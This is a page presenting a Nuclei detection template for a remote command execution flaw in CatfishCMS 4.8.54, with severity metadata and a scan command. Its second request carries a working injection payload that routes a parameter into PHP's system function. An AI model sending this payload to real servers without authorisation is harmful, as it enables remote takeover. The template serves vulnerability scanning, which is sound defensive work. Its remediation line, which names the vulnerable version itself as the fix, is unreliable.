CatfishCMS - Remote Command Execution

ID: CNVD-2019-06255

Severity: critical

Author: Lark-Lab

Tags: cnvd,cnvd2019,rce,catfishcms

Description

CatfishCMS 4.8.54 contains a remote command execution vulnerability in the “method” parameter.

YAML Source

id: CNVD-2019-06255

info:
  name: CatfishCMS - Remote Command Execution
  author: Lark-Lab
  severity: critical
  description: |
    CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
  remediation: Upgrade to CatfishCMS version 4.8.54 or later.
  reference:
    - https://its401.com/article/yun2diao/91344725
    - https://github.com/xwlrbh/Catfish/issues/4
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd,cnvd2019,rce,catfishcms
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        internal: true
        words:
          - 'content="Catfish CMS'

  - method: GET
    path:
      - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'OS'
          - 'PATH'
          - 'SHELL'
          - 'USER'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b2449ffb3ad2470c6025dbc2ae4e7deb64c58846f26997699701c5d4bed672202200163842e039cac07e6a0762e3d59f28720998e4b33ca3e399e3b8e908ecaa3dd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cnvd/2019/CNVD-2019-06255.yaml"

View on Github